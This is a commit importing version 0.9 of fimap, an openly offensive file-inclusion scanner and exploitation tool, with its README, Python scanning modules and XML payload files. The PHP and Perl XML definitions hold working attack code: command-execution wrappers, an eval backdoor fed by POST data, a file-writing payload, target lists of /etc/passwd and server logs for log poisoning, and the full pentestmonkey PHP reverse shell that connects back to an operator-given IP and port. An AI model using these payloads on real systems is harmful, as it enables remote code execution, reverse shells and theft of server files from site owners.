Commit 0fcebd15 authored by Devon Kearns's avatar Devon Kearns

Imported Upstream version 0.9

parents
Project Homepage : http://fimap.googlecode.com
To run fimap type: python fimap.py
Needs: Python >= 2.4
This is fimap alpha .09 - For the Swarm.
New in this version:
* Cookie scanning and attacking.
* New 'AutoAwesome' operating mode.
* Dot-Truncation mode for breaking suffixes on windows servers.
* New --force-os switch which lets you define in advance which OS to assume.
* Better logfile kickstarter injection.
* Dynamic RFI encoder for webservers which interpret your (PHP) code (--rfi_encode=php_b64).
* Tons of bugfixes.
* Lots of stuff I forgot to mention.
Thanks for all guys who are reporting bugs. And sorry for the long delay of this version.
I am busy with a lot of other tools :O
And as zerg always make sure your queen spreads the creep!
If you want fresh infos about updates feel free to follow: http://twitter.com/fimap
Except no spam there. I only post fimap updates which I think are important.
Please report all bugs you find directly at the project homepage.
Just to be clear - This tool is designed to improve the quality and security of YOUR website!
DO NOT USE IT FOR ILLEGAL STUFF! BE A GOOD INTERNET CITIZEN LIKE YOU ARE IN REALLIFE!
#
# This file is part of fimap.
#
# Copyright(c) 2009-2010 Iman Karim(ikarim2s@smail.inf.fh-brs.de).
# http://fimap.googlecode.com
#
# This file may be licensed under the terms of of the
# GNU General Public License Version 2 (the ``GPL'').
#
# Software distributed under the License is distributed
# on an ``AS IS'' basis, WITHOUT WARRANTY OF ANY KIND, either
# express or implied. See the GPL for the specific language
# governing rights and limitations.
#
# You should have received a copy of the GPL along with this
# program. If not, go to http://www.gnu.org/licenses/gpl.html
# or write to the Free Software Foundation, Inc.,
# 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.
#
from baseClass import baseClass
from targetScanner import targetScanner
from singleScan import singleScan
from xgoogle import BeautifulSoup
from copy import deepcopy
from crawler import crawler
import sys, time, Cookie
__author__="Iman Karim(ikarim2s@smail.inf.fh-brs.de)"
__date__ ="$09.11.2010 01:29:37$"
class autoawesome(baseClass):
def _load(self):
self.URL = None
def setURL(self, URL):
self.URL = URL
def scan(self):
print "Requesting '%s'..." %(self.URL)
extHeader = ""
code, headers = self.doRequest(self.URL, self.config["p_useragent"], self.config["p_post"], self.config["header"], self.config["p_ttl"])
if (headers != None):
for head in headers:
if head[0] in ("set-cookie", "set-cookie2"):
cookie = head[1]
c = Cookie.SimpleCookie()
c.load(cookie)
for k,v in c.items():
extHeader += "%s=%s; " %(k, c[k].value)
if (code == None):
print "Code == None!"
print "Does the target exist?!"
print "AutoAwesome mode failed. -> Aborting."
sys.exit(1)
if (extHeader != ""):
print "Cookies retrieved. Using them for further requests."
extHeader = extHeader.strip()[:-1]
if (self.config["header"].has_key("Cookie") and extHeader != ""):
print "WARNING: AutoAwesome mode got some cookies from the server."
print "Your defined cookies will be overwritten!"
if (extHeader != ""):
print "Testing file inclusion against given cookies..."
self.config["header"]["Cookie"] = extHeader
single = singleScan(self.config)
single.setURL(self.URL)
single.setQuite(True)
single.scan()
soup = BeautifulSoup.BeautifulSoup(''.join(code))
idx = 0
for form in soup.findAll("form"):
idx += 1
caption = None
desturl = None
method = None
if (soup.has_key("action")):
desturl = soup["action"]
else:
desturl = self.URL
if (form.has_key("name")):
caption = form["name"]
else:
caption = "Unnamed Form #%d" %(idx)
if (form.has_key("method")):
if (form["method"].lower() == "get"):
method = 0
else:
method = 1
else:
method = 1 # If no method is defined assume it's POST.
params = ""
for input in form.findAll("input"):
if (input.has_key("name")):
input_name = input["name"]
input_val = None
if (input.has_key("value")):
input_val = input["value"]
if (input_val == None):
params += "%s=&" %(input_name)
else:
params += "%s=%s&" %(input_name, input_val)
else:
print "An input field doesn't have an 'name' attribute! Skipping it."
if ("&" in params):
params = params[:-1]
print "Analyzing form '%s' for file inclusion bugs." %(caption)
modConfig = deepcopy(self.config)
if (method == 0):
# Append the current get params to the current URL.
if ("?" in desturl):
# There are already params in the URL.
desturl = "%s&%s" %(desturl, params)
else:
# There are no other params.
desturl = "%s&?%s" %(desturl, params)
else:
currentPost = modConfig["p_post"]
if (currentPost == None or currentPost == ""):
currentPost = params
else:
currentPost = currentPost + "&" + params
modConfig["p_post"] = currentPost
single = singleScan(modConfig)
single.setURL(desturl)
single.setQuite(True)
single.scan()
print "Starting harvester engine to get links (Depth: 0)..."
crawl = crawler(self.config)
crawl.crawl_url(self.URL, 0)
if (len(crawl.urlpool) == 0):
print "No links found."
else:
print "Harvesting done. %d links found. Analyzing links now..."%(len(crawl.urlpool))
for url in crawl.urlpool:
single = singleScan(self.config)
single.setURL(str(url[0]))
single.setQuite(True)
single.scan()
print "AutoAwesome is done."
\ No newline at end of file
This diff is collapsed.
import urllib, httplib, copy, urllib2
import string,random,os,socket, os.path
import xml.dom.minidom
import shutil
from time import gmtime, strftime
class baseTools(object):
LOG_ERROR = 99
LOG_WARN = 98
LOG_DEVEL = 1
LOG_DEBUG = 2
LOG_INFO = 3
LOG_ALWAYS= 4
config = None
log_lvl = None
boxsymbol = "#"
# Color hack
CONST_RST = "\033[0m"
CONST_COL = "\033[__BOLD__;3__COLOR__m"
BLACK = 0
RED = 1
GREEN = 2
YELLOW = 3
BLUE = 4
MAGENTA = 5
CYAN = 6
WHITE = 7
BOX_HEADER_STYLE = (1, 1)
BOX_SPLITTER_STYLE = (3, 0)
def getRandomStr(self):
chars = string.letters + string.digits
ret = ""
for i in range(8):
if (i==0):
ret = ret + random.choice(string.letters)
else:
ret = ret + random.choice(chars)
return ret
def initLog(self, config):
self.log_lvl = {}
self.log_lvl[baseTools.LOG_ERROR] = ("ERROR", (self.RED, 1))
self.log_lvl[baseTools.LOG_WARN] = ("WARN", (self.RED, 0))
self.log_lvl[baseTools.LOG_DEVEL] = ("DEVEL", (self.YELLOW, 0))
self.log_lvl[baseTools.LOG_DEBUG] = ("DEBUG", (self.CYAN, 0))
self.log_lvl[baseTools.LOG_INFO] = ("INFO", (self.BLUE, 0))
self.log_lvl[baseTools.LOG_ALWAYS] = ("OUT", (self.MAGENTA, 0))
self.LOG_LVL = config["p_verbose"]
self.use_color = config["p_color"]
self.config = config
if (self.use_color):
self.boxsymbol = self.CONST_COL + "#"
self.boxsymbol = self.boxsymbol.replace("__BOLD__", "1")
self.boxsymbol = self.boxsymbol.replace("__COLOR__", str(self.RED))
self.boxsymbol += self.CONST_RST
def _log(self, txt, LVL):
if (4-self.config["p_verbose"] < LVL):
logline = "[%s] %s" %(self.log_lvl[LVL][0], txt)
t = strftime("%H:%M:%S", gmtime())
if (self.use_color):
print "[%s] %s" %(t, self.__getColorLine(logline, self.log_lvl[LVL][1]))
else:
print "[%s] %s" %(t, logline)
def __setColor(self, txt, style):
ret = self.CONST_COL + txt
ret = ret.replace("__COLOR__", str(style[0]))
ret = ret.replace("__BOLD__", str(style[1]))
return(ret)
def __getColorLine(self, txt, style):
ret = self.__setColor(txt, style)
ret += self.CONST_RST
return(ret)
def drawBox(self, header, textarray, usecolor=None):
if (usecolor != None):
self.use_color = usecolor
maxLen = self.__getLongestLine(textarray, header) + 5
headspacelen = (maxLen/2 - len(header)/2)
print self.boxsymbol* (maxLen+1)
if (self.use_color):
cheader = self.__getColorLine(header, self.BOX_HEADER_STYLE)
self.__printBoxLine(cheader, maxLen, len(header))
else:
self.__printBoxLine(header, maxLen)
print self.boxsymbol* (maxLen+1)
for ln in textarray:
self.__printBoxLine(ln, maxLen)
print self.boxsymbol* (maxLen+1)
def __printBoxLine(self, txt, maxlen, realsize=-1):
size = len(txt)
if (realsize != -1): size = realsize
suffix = " " * (maxlen - size-1)
if (self.use_color):
coloredtxt = txt
if (txt.startswith("::")): # Informative Inline Message
coloredtxt = self.__getColorLine(txt, self.BOX_SPLITTER_STYLE)
print self.boxsymbol + coloredtxt + suffix + self.boxsymbol
else:
print self.boxsymbol + txt + suffix + self.boxsymbol
def __getLongestLine(self, textarray, header):
maxLen = len(header)
for ln in textarray:
if (len(ln) > maxLen):
maxLen = len(ln)
return(maxLen)
def getAttributeFromFirstNode(self, xmlfile, attrib):
if (os.path.exists(xmlfile)):
XML_plugin = xml.dom.minidom.parse(xmlfile)
XML_Rootitem = XML_plugin.firstChild
value = int(XML_Rootitem.getAttribute(attrib))
return(value)
else:
return False
def suggest_update(self, orginal_file, replacement_file):
#print orginal_file
#print replacement_file
inp = raw_input("Do you want to update? [y/N]")
if (inp == "Y" or inp == "y"):
print "Updating..."
os.unlink(orginal_file)
shutil.copy(replacement_file, orginal_file)
This diff is collapsed.
#
# This file is part of fimap.
#
# Copyright(c) 2009-2010 Iman Karim(ikarim2s@smail.inf.fh-brs.de).
# http://fimap.googlecode.com
#
# This file may be licensed under the terms of of the
# GNU General Public License Version 2 (the ``GPL'').
#
# Software distributed under the License is distributed
# on an ``AS IS'' basis, WITHOUT WARRANTY OF ANY KIND, either
# express or implied. See the GPL for the specific language
# governing rights and limitations.
#
# You should have received a copy of the GPL along with this
# program. If not, go to http://www.gnu.org/licenses/gpl.html
# or write to the Free Software Foundation, Inc.,
# 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.
#
__author__="Iman Karim(ikarim2s@smail.inf.fh-brs.de)"
__date__ ="$01.09.2009 13:56:47$"
settings = {}
settings["dynamic_rfi"] = {}
settings["dynamic_rfi"]["mode"] = "off" # Set to "ftp" or "local" to use Dynamic_RFI. Set it to "off" to disable it and rely on settings["filesrmt"] files.
###############
#!!!# WARNING #
###################################################################################################
# If you use dynamic_rfi make sure that NO file will be interpreted in the directory you define! #
# Else code (which should be interpreted on the victim server) will be executed on YOUR machine. #
# If you don't understand what I say then DON'T USE dynamic_rfi! #
###################################################################################################
# FTP Mode
settings["dynamic_rfi"]["ftp"] = {}
settings["dynamic_rfi"]["ftp"]["ftp_host"] = None
settings["dynamic_rfi"]["ftp"]["ftp_user"] = None
settings["dynamic_rfi"]["ftp"]["ftp_pass"] = None
settings["dynamic_rfi"]["ftp"]["ftp_path"] = None # A non existing file without suffix. Example: /home/imax/public_html/payload
settings["dynamic_rfi"]["ftp"]["http_map"] = None # The mapped HTTP path of the file. Example: http://localhost/~imax/payload
# Local Mode
settings["dynamic_rfi"]["local"] = {}
settings["dynamic_rfi"]["local"]["local_path"] = None # A non existing file on your filesystem without prefix which is reachable by http. Example: /var/www/payload
settings["dynamic_rfi"]["local"]["http_map"] = None # The http url of the file without prefix where the file is reachable from the web. Example: http://localhost/payload
<?xml version="1.0" encoding="UTF-8"?>
<fimap language="generic" revision="0">
<relative_files>
<file path="/etc/passwd" find="root:" flags="r" unix="1" windows="0"/>
<file path="c:\boot.ini" find="[operating" flags="r" unix="0" windows="1"/>
<file path="/proc/self/environ" find="HTTP_USER_AGENT=" flags="rxA" unix="1" windows="0"/>
</relative_files>
<absolute_files>
</absolute_files>
<remote_files>
</remote_files>
<log_files>
<file path="/var/log/apache2/access.log" find='"GET /' flags="LHx" unix="1" windows="0" />
<file path="/var/log/apache/access.log" find='"GET /' flags="LHx" unix="1" windows="0" />
<file path="/var/log/httpd/access.log" find='"GET /' flags="LHx" unix="1" windows="0" />
<file path="/var/log/apache2/access_log" find='"GET /' flags="LHx" unix="1" windows="0" />
<file path="/var/log/apache/access_log" find='"GET /' flags="LHx" unix="1" windows="0" />
<file path="/var/log/httpd/access_log" find='"GET /' flags="LHx" unix="1" windows="0" />
</log_files>
<blind_files mindepth="0" maxdepth="15">
<file path="/etc/passwd" find="root:" flags="r" unix="1" windows="0"/>
<file path="c:\boot.ini" find="[operating" flags="r" unix="0" windows="1"/>
</blind_files>
<methods>
<unix concatcommand=";">
<shellquiz source="cm5kMSA9IHJhbmRvbS5yYW5kcmFuZ2UoMTAsIDk5KQpybmQyID0gcmFuZG9tLnJhbmRyYW5nZSgxMCwgOTkpCnJlc3VsdCA9IHN0cihybmQxICogcm5kMikKc2hlbGxjb2RlID0gImVjaG8gJCgoJWQqJWQpKSIlKHJuZDEsIHJuZDIpCnJldCA9IChzaGVsbGNvZGUsIHJlc3VsdCk=" />
<kernelversion source="uname -r -s" />
<currentdir source="pwd" />
<currentuser source="whoami" />
<cd source="cd '__DIR__'" />
</unix>
<windows concatcommand="&amp;">
<shellquiz source="cm5kMSA9IHJhbmRvbS5yYW5kcmFuZ2UoMTAsIDk5KQpybmQyID0gcmFuZG9tLnJhbmRyYW5nZSgxMCwgOTkpCnJlc3VsdCA9IHN0cihybmQxICogcm5kMikKc2hlbGxjb2RlID0gInNldCAvYSAlZColZCIlKHJuZDEsIHJuZDIpCnJldCA9IChzaGVsbGNvZGUsIHJlc3VsdCkK" />
<kernelversion source="ver" />
<currentdir source="chdir" />
<currentuser source="echo %USERNAME%" />
<cd source='cd "__DIR__"' />
</windows>
</methods>
<languagesets>
<language name="PHP" langfile="php.xml" />
<language name="Perl" langfile="perl.xml" />
</languagesets>
</fimap>
<?xml version="1.0" encoding="UTF-8"?>
<fimap language="perl" revision="0" force_inclusion_test="1" autor="Iman Karim (ikarim2s@smail.inf.fh-brs.de)" >
<snipe regex="Can't locate (?P&lt;script&gt;[\d\w/\.\-]*?%s[\d\w/\.\-]*?) in .*? at.*?line \d+?\." />
<relative_files>
</relative_files>
<absolute_files>
</absolute_files>
<remote_files>
<file path="http://www.apache.org/dyn/closer.cgi" find="We suggest the following mirror site for your download" flags="rR" unix="1" windows="1"/>
</remote_files>
<log_files>
</log_files>
<exec_methods>
<exec unix="1" win="0" dobase64="1" name="system[b64]" source='use MIME::Base64; system(base64_decode("__PAYLOAD__")) . " 2&gt;&amp;1";' />
<exec unix="1" win="0" dobase64="0" name="system" source='system("__PAYLOAD__" . " 2&gt;&amp;1";' />
<exec unix="0" win="1" dobase64="1" name="system[b64][win]" source='use MIME::Base64; system(base64_decode("__PAYLOAD__"));' />
<exec unix="0" win="1" dobase64="0" name="system[win]" source='system("__PAYLOAD__");' />
</exec_methods>
<payloads>
</payloads>
<methods>
<quiz isbase64="1" source="cm5kID0gc2VsZi5nZXRSYW5kb21TdHIoKQpwaHBjb2RlID0gImVjaG8gIgpmb3IgYyBpbiBybmQ6CiAgICBwaHBjb2RlICs9ICJjaHIoJWQpLiIlKG9yZChjKSkKcGhwY29kZSA9ICI8P3BocCAlczsgPz4iICUocGhwY29kZVs6LTFdKQpyZXQgPSAocGhwY29kZSwgcm5kKQo=" />
<print isbase64="0" source="print '__PLACEHOLDER__';" />
</methods>
<detectors>
<include_patterns>
<pattern regex="in .*? at (.*?) line \d+?\." />
</include_patterns>
<readfile_patterns>
</readfile_patterns>
<extentions>
<extention ext=".cgi"/>
<extention ext=".pl"/>
</extentions>
</detectors>
</fimap>
<?xml version="1.0" encoding="UTF-8"?>
<fimap language="php" revision="3" force_inclusion_test="0" autor="Iman Karim (ikarim2s@smail.inf.fh-brs.de)" >
<snipe regex="Failed opening( required)* '(?P&lt;incname&gt;[\d\w/\.\-:\\]*?%s[\d\w/\.\-\\]*?)' (for inclusion)*" />
<relative_files>
</relative_files>
<absolute_files>
<file path="php://input" post="__QUIZ__" find="__ANSWER__" flags="rxP" unix="1" windows="1"/>
</absolute_files>
<remote_files>
<file path="http://www.phpbb.de/index.php" find="Willkommen auf phpBB.de" flags="rR" unix="1" windows="1"/>
</remote_files>
<log_files>
</log_files>
<exec_methods>
<exec unix="1" win="0" dobase64="1" name="popen[b64]" source='&lt;?php $h=popen(base64_decode("__PAYLOAD__") . " 2&gt;&amp;1", "r");while(!feof($h)){$l=fread($h, 2024);echo $l;}?&gt;' />
<exec unix="1" win="0" dobase64="1" name="passthru[b64]" source='&lt;?php passthru (base64_decode("__PAYLOAD__"). " 2&gt;&amp;1"); ?&gt;' />
<exec unix="1" win="0" dobase64="1" name="exec[b64]" source='&lt;?php exec(base64_decode("__PAYLOAD__"). " 2&gt;&amp;1", $arr); $data = join("\n",$arr); echo $data; ?&gt;' />
<exec unix="1" win="0" dobase64="1" name="popen[b64]" source='&lt;?php system (base64_decode("__PAYLOAD__"). " 2&gt;&amp;1"); ?&gt;' />
<exec unix="1" win="0" dobase64="0" name="popen" source='&lt;?php $h=popen("__PAYLOAD__" . " 2&gt;&amp;1", "r");while(!feof($h)){$l=fread($h, 2024);echo $l;}?&gt;' />
<exec unix="1" win="0" dobase64="0" name="passthru" source='&lt;?php passthru ("__PAYLOAD__". " 2&gt;&amp;1"); ?&gt;' />
<exec unix="1" win="0" dobase64="0" name="exec" source='&lt;?php exec("__PAYLOAD__". " 2&gt;&amp;1", $arr); $data = join("\n", $arr); echo $data; ?&gt;' />
<exec unix="1" win="0" dobase64="0" name="system" source='&lt;?php system ("__PAYLOAD__". " 2&gt;&amp;1"); ?&gt;' />
<exec unix="0" win="1" dobase64="1" name="popen[b64][win]" source='&lt;?php $h=popen(base64_decode("__PAYLOAD__") , "r");while(!feof($h)){$l=fread($h, 2024);echo $l;}?&gt;' />
<exec unix="0" win="1" dobase64="1" name="passthru[b64][win]" source='&lt;?php passthru (base64_decode("__PAYLOAD__")); ?&gt;' />
<exec unix="0" win="1" dobase64="1" name="exec[b64][win]" source='&lt;?php exec(base64_decode("__PAYLOAD__"), $arr); $data = join("\n",$arr); echo $data; ?&gt;' />
<exec unix="0" win="1" dobase64="1" name="popen[b64][win]" source='&lt;?php system (base64_decode("__PAYLOAD__")); ?&gt;' />
<exec unix="0" win="1" dobase64="0" name="popen[win]" source='&lt;?php $h=popen("__PAYLOAD__" , "r");while(!feof($h)){$l=fread($h, 2024);echo $l;}?&gt;' />
<exec unix="0" win="1" dobase64="0" name="passthru[win]" source='&lt;?php passthru ("__PAYLOAD__"); ?&gt;' />
<exec unix="0" win="1" dobase64="0" name="exec[win]" source='&lt;?php exec ("__PAYLOAD__", $arr); $data = join("\n",$arr); echo $data; ?&gt;' />
<exec unix="0" win="1" dobase64="0" name="system[win]" source='&lt;?php system ("__PAYLOAD__"); ?&gt;' />
</exec_methods>
<payloads>
<payload name="Spawn pentestmonkey's reverse shell" dobase64="0" inshell="0" unix="1" win="0">
<input type="question" text="IP Address to connect back to: " placeholder="__IP__" />
<input type="question" text="The Port it should connect back: " placeholder="__PORT__" />
<input type="wait" text="Make your netcat server ready and hit enter..." />
<code source='&lt;?php set_time_limit (0);$VERSION = "1.0";$ip = "__IP__";$port = __PORT__;$chunk_size = 1400;$write_a = null;$error_a = null;$shell = "uname -a; w; id; /bin/sh -i";$daemon = 0;$debug = 0;if (function_exists("pcntl_fork")) { $pid = pcntl_fork();if ($pid == -1) { printit("ERROR: Cant fork");exit(1);} if ($pid) { exit(0);} if (posix_setsid() == -1) { printit("Error: Cant setsid()");exit(1);} $daemon = 1;} else {printit("WARNING: Failed to daemonise.This is quite common and not fatal.");}chdir("/");umask(0);$sock = fsockopen($ip, $port, $errno, $errstr, 30);if (!$sock) { printit("$errstr ($errno)");exit(1);}$descriptorspec = array( 0 => array("pipe", "r"), 1 => array("pipe", "w"), 2 => array("pipe", "w"));$process = proc_open($shell, $descriptorspec, $pipes);if (!is_resource($process)) {printit("ERROR: Cant spawn shell"); exit(1);}stream_set_blocking($pipes[0], 0);stream_set_blocking($pipes[1], 0);stream_set_blocking($pipes[2], 0);stream_set_blocking($sock, 0);printit("Successfully opened reverse shell to $ip:$port");while (1) {if (feof($sock)) {printit("ERROR: Shell connection terminated");break;} if (feof($pipes[1])) {printit("ERROR: Shell process terminated"); break;} $read_a = array($sock, $pipes[1], $pipes[2]); $num_changed_sockets = stream_select($read_a, $write_a, $error_a, null);if (in_array($sock, $read_a)) { if ($debug) printit("SOCK READ"); $input = fread($sock, $chunk_size); if ($debug) printit("SOCK: $input");fwrite($pipes[0], $input);} if (in_array($pipes[1], $read_a)) { if ($debug) printit("STDOUT READ"); $input = fread($pipes[1], $chunk_size); if ($debug) printit("STDOUT: $input");fwrite($sock, $input);} if (in_array($pipes[2], $read_a)) { if ($debug) printit("STDERR READ"); $input = fread($pipes[2], $chunk_size); if ($debug) printit("STDERR: $input");fwrite($sock, $input);}}fclose($sock);fclose($pipes[0]);fclose($pipes[1]);fclose($pipes[2]);proc_close($process);function printit ($string) { if (!$daemon) { print "$string\n";}}?&gt;' />
</payload>
</payloads>
<methods>
<quiz isbase64="1" source="cm5kID0gc2VsZi5nZXRSYW5kb21TdHIoKQpwaHBjb2RlID0gImVjaG8gIgpmb3IgYyBpbiBybmQ6CiAgICBwaHBjb2RlICs9ICJjaHIoJWQpLiIlKG9yZChjKSkKcGhwY29kZSA9ICI8P3BocCAlczsgPz4iICUocGhwY29kZVs6LTFdKQpyZXQgPSAocGhwY29kZSwgcm5kKQo=" />
<print isbase64="0" source="&lt;?php echo '__PLACEHOLDER__'; ?&gt;" />
<eval_kickstarter isbase64="0" source="&lt;?php eval(base64_decode($_POST['data'])); ?&gt;" />
<write_file isbase64="1" source="PD9waHAgJG15RmlsZSA9ICJfX0ZJTEVfXyI7CiRmaCA9IGZvcGVuKCRteUZpbGUsICdfX01PREVfXycpIG9yIGRpZSgiRkFJTEVEIik7CiRkID0gYmFzZTY0X2RlY29kZSgiX19CNjRfREFUQV9fIik7CmZ3cml0ZSgkZmgsICRkKTsKZmNsb3NlKCRmaCk7ID8+" />
</methods>
<detectors>
<include_patterns>
<pattern regex="\(include_path='.*?'\) in &lt;b&gt;(?P&lt;script&gt;.*?)&lt;/b&gt;* on line" />
<pattern regex="failed to open stream: No such file or directory \((?P&lt;script&gt;.*?)- Line" />
<pattern regex="An error occurred in script '(?P&lt;script&gt;.*?)' on line \d?." />
<pattern regex="Failed opening '.*?' for inclusion in &lt;b&gt; (?P&lt;script&gt;.*?)&lt;/b&gt; on line" />
<pattern regex="Failed opening '.*?' for inclusion .*? in (&lt;b&gt; )?(?P&lt;script&gt;.*?) (&lt;b&gt; )?on line" />
<pattern regex="Failed opening required '.*?' .*? in (?P&lt;script&gt;.*?) on" />
<pattern regex="failed to open stream:.*?@(?P&lt;script&gt;.*?):" />
<pattern regex="in file &lt;b&gt;(?P&lt;script&gt;.*?)&lt;/b&gt;" />
<pattern regex="failed to open stream: No such file or directory in (?P&lt;script&gt;.*?) on line" />
<pattern regex="failed to open stream: No such file or directory in &lt;b&gt;(?P&lt;script&gt;.*?)&lt;/b&gt; on line" />
<pattern regex="Failed opening .*? for inclusion .*?on (?P&lt;script&gt;.*?) " />
</include_patterns>
<readfile_patterns>
<pattern regex="&lt;b&gt;Warning&lt;/b&gt;: file(.*?%s.*?)*" />
<pattern regex="&lt;b&gt;Warning&lt;/b&gt;: read_file(.*?%s.*?)*" />
<pattern regex="&lt;b&gt;Warning&lt;/b&gt;: highlight_file(.*?%s.*?)*" />
<pattern regex="&lt;b&gt;Warning&lt;/b&gt;: show_source(.*?%s.*?)*" />
</readfile_patterns>
<extentions>
<extention ext=".php" />
<extention ext=".php3" />
<extention ext=".php4" />
<extention ext=".php5" />
<extention ext=".phtml" />
</extentions>
</detectors>
</fimap>
#
# This file is part of fimap.
#
# Copyright(c) 2009-2010 Iman Karim(ikarim2s@smail.inf.fh-brs.de).
# http://fimap.googlecode.com
#
# This file may be licensed under the terms of of the
# GNU General Public License Version 2 (the ``GPL'').
#
# Software distributed under the License is distributed
# on an ``AS IS'' basis, WITHOUT WARRANTY OF ANY KIND, either
# express or implied. See the GPL for the specific language
# governing rights and limitations.
#
# You should have received a copy of the GPL along with this
# program. If not, go to http://www.gnu.org/licenses/gpl.html
# or write to the Free Software Foundation, Inc.,
# 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.
#
import os.path
from xgoogle.BeautifulSoup import BeautifulSoup
import os, urllib2, urllib, socket
__author__="Iman Karim(ikarim2s@smail.inf.fh-brs.de)"
__date__ ="$09.09.2009 21:52:30$"
class crawler:
def __init__(self, config):
self.goodTypes = ("html", "php", "php4", "php5", "jsp", "htm", "py", "pl", "asp", "cgi", "/")
self.config = config
self.urlpool = []
def crawl(self):
root_url = self.config["p_url"]
outfile = open(self.config["p_write"], "a")
idx = 0
print "[%d] Going to root URL: '%s'..." %(idx, root_url)
if (self.countChar(root_url, "/") == 2):
root_url = root_url + "/"
self.crawl_url(root_url)
while(len(self.urlpool)-idx > 0):
url , level = self.urlpool[idx]
url = self.__encodeURL(url)
print "[Done: %d | Todo: %d | Depth: %d] Going for next URL: '%s'..." %(idx, len(self.urlpool) - idx, level, url)
outfile.write(url + "\n")
self.crawl_url(url, level)
idx = idx +1
print "Harvesting done."
outfile.close()
def countChar(self, word, c):
cnt = 0
for w in word:
if w == c:
cnt += 1
return(cnt)
def crawl_url(self, url, level=0):
if (url.count("/") == 2): # If the user provides 'http://www.google.com' append an / to it.
url += "/"
code = self.__simpleGetRequest(url)
domain = self.getDomain(url, True)
if (code != None):
soup = None
try:
soup = BeautifulSoup(code)
except:
pass
if soup != None:
for tag in soup.findAll('a'):
isCool = False
new_url = None
try:
new_url = tag['href']
except KeyError, err:
pass
if new_url != None and not new_url.startswith("#") and not new_url.startswith("javascript:"):
if(new_url.startswith("http://") or new_url.startswith("https://")):
if (new_url.lower().startswith(domain.lower())):
isCool = True
else:
if (new_url.startswith("/")):
new_url = os.path.join(domain, new_url[1:])
else:
new_url = os.path.join(os.path.dirname(url), new_url)
isCool = True
if (isCool and self.isURLinPool(new_url)):
isCool = False
if (isCool):
tmpUrl = new_url
if (tmpUrl.find("?") != -1):
tmpUrl = tmpUrl[:tmpUrl.find("?")]
for suffix in self.goodTypes:
if (tmpUrl.endswith(suffix)):
if (level+1 <= self.config["p_depth"]):
self.urlpool.append((new_url, level+1))
break
def isURLinPool(self, url):
for u, l in self.urlpool:
if u.lower() == url.lower():
return True
return False
def __simpleGetRequest(self, URL, TimeOut=10):
try:
try:
opener = urllib2.build_opener()
opener.addheaders = [('User-agent', self.config["p_useragent"])]
f = opener.open(URL, timeout=TimeOut) # TIMEOUT
ret = f.read()
f.close()
return(ret)
except TypeError, err:
try:
# Python 2.5 compatiblity
socket.setdefaulttimeout(TimeOut)
f = opener.open(URL)
ret = f.read()
f.close()
return(ret)
except Exception, err:
raise
except:
raise